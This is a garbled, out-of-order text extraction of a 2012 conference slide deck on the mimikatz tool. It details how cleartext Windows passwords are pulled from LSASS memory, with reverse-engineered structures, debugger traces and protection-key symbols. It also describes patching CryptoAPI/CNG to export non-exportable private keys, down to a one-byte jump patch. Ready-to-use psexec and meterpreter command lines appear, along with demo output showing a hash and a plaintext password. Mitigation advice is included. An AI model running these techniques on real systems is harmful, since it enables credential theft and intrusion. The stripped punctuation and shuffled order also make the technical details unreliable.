mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsahistory of laquo pass-the- raquo 12
Pass-the-hashndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo HernanOchoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticketndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 8
mimikatz sekurlsahistory of laquo pass-the- raquo 22
Pass-the-passndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3)bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memorybull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe)bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9
mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10
mimikatz sekurlsa tspkgwhat is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquosexperiencendash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation)ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11
mimikatz sekurlsa tspkgquestions
KB says that for it works we must enable laquo Default credentials raquo delegationndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellipndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCredsbull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos)bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12
mimikatz sekurlsa tspkgsymbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenariondash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13
kdgt x tspkgclear75016d1c tspkgTSObtainClearCreds = ltno type informationgtkdgt x tspkgpassword75011b68 tspkgTSDuplicatePassword = ltno type informationgt75011cd4 tspkgTSHidePassword = ltno type informationgt750195ee tspkgTSRevealPassword = ltno type informationgt75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgtkdgt x tspkglocate7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkgworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENTIAL
KIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0LSA_UNICODE_STRING DomaineLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64
BYTE unk0[108]elif defined _M_IX86
BYTE unk0[64]endif
LUID LocallyUniqueIdentifierPVOID unk1PVOID unk2PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary
KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIALKIWI_TS_CREDEN
TIAL
mimikatz sekurlsa tspkgdemo time
sekurlsatspkg
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15
mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
